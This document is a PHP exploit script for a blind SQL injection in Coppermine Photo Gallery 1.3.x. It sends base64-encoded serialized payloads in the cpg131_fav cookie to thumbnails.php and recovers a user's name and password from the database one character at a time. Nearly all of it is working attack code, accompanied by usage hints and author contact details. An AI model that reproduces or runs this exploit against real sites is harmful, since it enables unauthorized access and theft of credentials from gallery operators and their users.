<? # Coppermine Photo Gallery 1.3.x Blind SQL Injection Exploit # by s0cratex, RTM Member # Visit: www.zonartm.org
/* You need make a small work... Add a fav pic, enter to the site and add /addfav.php?pid=2 for example..xD ... in the line: if(eregi("download",fgets($cnx2))){ $pass.=chr($i); echo chr($i); break; } } the word "download" depends of the language... */
# saludos a rgod, OpTix, crypkey 'n mechas...
error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5);
$host = "localhost"; $path = "/cpg"; $port = "80"; $id = "1";
echo "Coppermine Photo Gallery 1.3.x fav Blind SQL Injection Exploit\n"; echo "--------------------------------------------------------------\n"; echo "\n"; echo "Username -> "; $j = 1; $user = ""; while(!strstr($user,chr(0))){ for($x=0;$x<255;$x++){ $xpl = "'') OR 1=(SELECT (IF((ASCII(SUBSTRING(user_name,".$j.",1))=".$x."),1,0)) FROM cpg131_users WHERE user_id=".$id.")/*"; $xpl = "a:1:{i:0;s:".strlen($xpl).":\"".$xpl."\";}"; $xpl = base64_encode($xpl); $cnx = fsockopen($host,$port); fwrite($cnx, "GET ".$path."/thumbnails.php?album=favpics HTTP/1.0\r\nCookie: cpg131_fav=".$xpl."\r\n\r\n"); while(!feof($cnx)){ if(eregi("download",fgets($cnx))){ $user.=chr($x); echo chr($x); break; } } fclose($cnx); if ($x==255) { die("\n Try again..."); } } $j++; } echo "\n"; echo "Password -> "; $a = 1; $pass = ""; while(!strstr($pass,chr(0))){ for($i=0;$i<255;$i++){ $xpl = "'') OR 1=(SELECT (IF((ASCII(SUBSTRING(user_password,".$a.",1))=".$i."),1,0)) FROM cpg131_users WHERE user_id=".$id.")/*"; $xpl = "a:1:{i:0;s:".strlen($xpl).":\"".$xpl."\";}"; $xpl = base64_encode($xpl); $cnx2 = fsockopen($host,$port); fwrite($cnx2, "GET ".$path."/thumbnails.php?album=favpics HTTP/1.0\r\nCookie: cpg131_fav=".$xpl."\r\n\r\n"); while(!feof($cnx2)){ if(eregi("download",fgets($cnx2))){ $pass.=chr($i); echo chr($i); break; } } fclose($cnx2); if ($i==255) { die("\n Try again..."); } } $a++; } echo "--------------------------------------------------------------\n"; echo "s0cratex@zonartm.org || if you speak spanish->MSN: s0cratex@hotmail.com ..xD\n"; echo "www.zonartm.org/blog/s0cratex\n"; echo "plexinium.com comming soon <- Hacking Nica\n"; ?>